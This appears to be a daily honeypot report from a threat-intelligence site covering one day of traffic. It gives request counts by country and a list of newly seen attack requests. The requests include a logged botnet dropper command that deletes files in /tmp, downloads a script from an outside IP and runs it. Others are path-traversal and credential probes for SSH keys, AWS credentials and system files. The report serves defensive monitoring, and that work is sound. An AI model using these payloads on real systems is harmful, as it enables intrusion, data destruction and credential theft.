Skip to main content
  1. Daily-Posts/

Report: 2025-08-24

·992 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-24
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 150 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3236 requests were recorded during the day, originating from 1 different countries, with a peak of 2846 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBGermany
GBGermany
USGermany
USGermany
BRGermany
GBGermany

botnet_dropper_behaviour
#

remote_addrrequest
8.219.240.83GET /shell?cd+/tmp;rm+-rf+*;wget+196.251.86.86/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
68SSH-2.0-libssh_0.11.2
1992POST /boafrm/formWsc HTTP/1.1
2682POST /goform/Mail_Test HTTP/1.1
4891GET /config/keys.js HTTP/1.1
4901GET /config/db.js HTTP/1.1
4941GET /config/database.py HTTP/1.1
5091GET /config/application-prod.properties HTTP/1.1
5121GET /config/application-dev.properties HTTP/1.1
5751GET /src/config/settings.js HTTP/1.1
5761GET /app/code/local.xml HTTP/1.1
6131GET /src/config/config.ts HTTP/1.1
6331GET /gatsby-browser.js HTTP/1.1
6341GET /config/test.py HTTP/1.1
6351GET /gatsby-ssr.js HTTP/1.1
6361GET /config/settings.js HTTP/1.1
6371GET /config/environment.js HTTP/1.1
6401GET /config/packages/dev/twig.yaml HTTP/1.1
6421GET /config/packages/test/security.yaml HTTP/1.1
6431GET /config/routes/dev/twig.yaml HTTP/1.1
6441GET /config/dev.env.js HTTP/1.1
6451GET /config/secrets.py HTTP/1.1
6461GET /config/prod.env.js HTTP/1.1
6481GET /config/staging.env.js HTTP/1.1
6491GET /src/configuration.js HTTP/1.1
6531GET /server/settings.js HTTP/1.1
6541GET /server/environment.js HTTP/1.1
6561GET /config/test.env.js HTTP/1.1
6591GET /conf/development.conf HTTP/1.1
6601GET /conf/production.conf HTTP/1.1
6611GET /conf/test.conf HTTP/1.1
6631GET /conf/application.properties HTTP/1.1
6641GET /config/connections.js HTTP/1.1
6661GET /src/config/configuration.js HTTP/1.1
6731GET /conf/application.yaml HTTP/1.1
6741GET /config/routes.rb HTTP/1.1
6791GET /config/database.go HTTP/1.1
6801GET /config/env.go HTTP/1.1
6831GET /config/production.py HTTP/1.1
6841GET /config/development.py HTTP/1.1
7631GET /src/main/resources/security.properties HTTP/1.1
7641GET /src/main/resources/database.properties HTTP/1.1
7821GET /src/config/settings.ts HTTP/1.1
7861GET /src/config/app.config.ts HTTP/1.1
7911GET /src/environments/environment.staging.ts HTTP/1.1
8141GET /config/application-test.properties HTTP/1.1
9651GET /.mailgun/private_keys.json HTTP/1.1
9661GET /config/secrets/aws_keys.json HTTP/1.1
9671GET /config/secrets/gcp_keys.json HTTP/1.1
9681GET /config/secrets/sendgrid.json HTTP/1.1
9691GET /config/secrets/sendinblue.json HTTP/1.1
9701GET /config/secrets/mailgun.json HTTP/1.1
9711GET /config/private/aws_keys.json HTTP/1.1
9731GET /config/private/sendgrid.json HTTP/1.1
9741GET /config/private/sendinblue.json HTTP/1.1
9751GET /config/private/mailgun.json HTTP/1.1
9811GET /config/private/gcp_keys.json HTTP/1.1
9831GET /../../../../etc/sudoers HTTP/1.1
9841GET /../../../../proc/self/environ HTTP/1.1
9851GET /../../../../proc/self/mounts HTTP/1.1
9861GET /../../../../var/log/secure HTTP/1.1
9871GET /../../../../var/log/messages HTTP/1.1
9881GET /../../../../var/log/nginx/error.log HTTP/1.1
9891GET /.sendinblue/api_keys.json HTTP/1.1
9901GET /../../../../var/log/mysql/mysql.log HTTP/1.1
9911GET /../../../../home/*/.ssh/id_rsa HTTP/1.1
9921GET /../../../../home/*/.aws/credentials HTTP/1.1
9931GET /../../../../home/*/.sendgrid/keys.json HTTP/1.1
9941GET /../../../../home/*/.mailgun/private_keys.json HTTP/1.1
9951GET /.gcp/service_account_keys.json HTTP/1.1
9961GET /.gcp/project_tokens.json HTTP/1.1
9971GET /.sendgrid/keys.json HTTP/1.1
9981GET /../../../../var/log/apache2/error.log HTTP/1.1
10201POST /cgi-bin/ViewLog.asp HTTP/1.1
10281\x00\x0E8\xCD\xD3\x9C\xF3\x8C\x05\xBC\x1A\x00\x00\x00\x00\x00
10291POST /goform/setPingInfo HTTP/1.1
10321POST /goform/mp HTTP/1.1
19731GET /resources/application.conf HTTP/1.1
20681GET /src/setupTests.js HTTP/1.1
20691GET /src/constants.js HTTP/1.1
20711GET /config-overrides.js HTTP/1.1
20731GET /src/env.js HTTP/1.1
20741GET /src/config/index.js HTTP/1.1
20761GET /config/packages/prod.yaml HTTP/1.1
20771GET /config/packages/dev.yaml HTTP/1.1
20781GET /config/packages/test.yaml HTTP/1.1
20791GET /config/routes.yaml HTTP/1.1
20801GET /config/packages/security.yaml HTTP/1.1
20811GET /config/packages/doctrine.yaml HTTP/1.1
20821GET /config/packages/twig.yaml HTTP/1.1
20831GET /config/packages/framework.yaml HTTP/1.1
20851GET /src/main/resources/application-context.xml HTTP/1.1
20881GET /src/environments/environment.dev.ts HTTP/1.1
20891GET /src/environments/environment.test.ts HTTP/1.1
20921GET /src/setupProxy.js HTTP/1.1
20991GET /src/config/env.js HTTP/1.1
21021GET /conf/application-prod.conf HTTP/1.1
21031GET /conf/application-test.conf HTTP/1.1
21041GET /conf/dev-application.conf HTTP/1.1
21051GET /conf/prod-application.conf HTTP/1.1
21091GET /config/packages/cache.yaml HTTP/1.1
21101GET /client/config.js HTTP/1.1
21181GET /server/env.js HTTP/1.1
21211GET /config/env/development.js HTTP/1.1
21231GET /config/env/test.js HTTP/1.1
21241GET /config/bootstrap.js HTTP/1.1
21251GET /config/models.js HTTP/1.1
21261GET /config/policies.js HTTP/1.1
21271GET /conf/application-dev.conf HTTP/1.1
21281GET /config/session.js HTTP/1.1
21291GET /config/sockets.js HTTP/1.1
21301GET /config/views.js HTTP/1.1
21311GET /conf/application.conf HTTP/1.1
21321GET /conf/routes HTTP/1.1
21331GET /conf/logback.xml HTTP/1.1
21341GET /conf/messages HTTP/1.1
21351GET /conf/play.plugins HTTP/1.1
21361GET /config/routes.js HTTP/1.1
21371GET /?xdebuginfo HTTP/1.1
21381GET /Node.js/JavaScript HTTP/1.1
21431GET /config/dev_config.py HTTP/1.1
21441GET /src/main/resources/log4j2.xml HTTP/1.1
21451GET /config/test_config.py HTTP/1.1
21461GET /development.py HTTP/1.1
21491GET /config/application.rb HTTP/1.1
21521GET /config/initializers/devise.rb HTTP/1.1
21531GET /config/prod_config.py HTTP/1.1
21581GET /staticfiles HTTP/1.1
21611GET /src/main/resources/appsettings.yml HTTP/1.1
21641GET /src/main/resources/application.properties HTTP/1.1
21691GET /device/device.js HTTP/1.1
21721GET /config/settings/base.py HTTP/1.1
21731GET /config/settings/local.py HTTP/1.1
21791GET /config/initializers/sidekiq.rb HTTP/1.1
21821GET /src/main/resources/bootstrap.yml HTTP/1.1
21831GET /src/main/resources/bootstrap.properties HTTP/1.1
21841GET /src/main/resources/application-dev.yml HTTP/1.1
21851GET /src/main/resources/application-prod.yml HTTP/1.1
21861GET /src/main/resources/application-test.yml HTTP/1.1
21871GET /src/main/resources/logback-spring.xml HTTP/1.1
21891GET /config/cable.yml HTTP/1.1
21901GET /config/puma.rb HTTP/1.1
21951GET /web.Release.config HTTP/1.1
21961GET /web.Debug.config HTTP/1.1
21971GET /config/settings/init.py HTTP/1.1
22001GET /config/dev_settings.py HTTP/1.1
22011GET /config/prod_settings.py HTTP/1.1
22021GET /config/test_settings.py HTTP/1.1
22031GET /config/asgi.py HTTP/1.1
22041GET /config/wsgi.py HTTP/1.1
22051GET /config/urls.py HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
02846GB
1124US
281BG
349IN
436NL
532SC
620RU
78CN
87DE
94UA
104JP
113FR
123ZA
132KR
142BE
152HK
162SG
172TR
182CA
191PL
201MC
211AM
221ID
231BR
241AU
251BD

Related

Report: 2025-08-23
·474 words
Repport Daily
Report: 2025-08-22
·397 words
Repport Daily
Report: 2025-08-21
·4037 words
Repport Daily